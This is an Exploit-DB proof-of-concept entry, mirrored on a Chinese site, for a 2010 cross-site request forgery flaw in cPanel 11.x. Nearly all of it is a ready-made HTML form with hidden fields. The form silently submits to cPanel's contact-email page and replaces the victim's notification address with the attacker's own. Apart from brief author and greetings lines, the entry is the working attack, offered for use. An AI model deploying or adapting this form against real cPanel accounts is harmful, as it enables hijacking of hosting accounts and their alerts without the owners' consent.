cPanel 11.x – Cross-Site Request Forgery (Edit E-mail) - 体验盒子

作者： Mon7rF .

日期： 2010-11-21

类别：

webapps

平台：

php

来源：https://www.exploit-db.com/exploits/15593/

# Exploit Title: Cpanel 11.X Edit E-mailCross Site Request Forgery exploit
# Date: 22 - 10 - 2010
# Author: Mon7rF
# Mail : X0h@msn.com
# Tested on: Windows 7

--------------------------------------------------------------------------------------

<form onsubmit="return do_validate(this.id);" id="mainform" name="mainform"
action="http://www.site.com:2082/frontend/x3/contact/saveemail.html">

<input id="email"name="email"type="hidden" value="X0h@msn.com">
<input id="second_email" name="second_email" type="hidden" value="">
<input id="notify_disk_limit"name="notify_disk_limit"type="hidden" value="1">
<input id="notify_bandwidth_limit" name="notify_bandwidth_limit" type="hidden" value="1">
<input id="notify_email_quota_limit" name="notify_email_quota_limit" type="hidden" value="1">

<input type="submit" class="input-button" value="Save">

</form>

--------------------------------------------------------------------------------------

Gr33ts : RENO - Mr.M3x - all Member p0c Team ..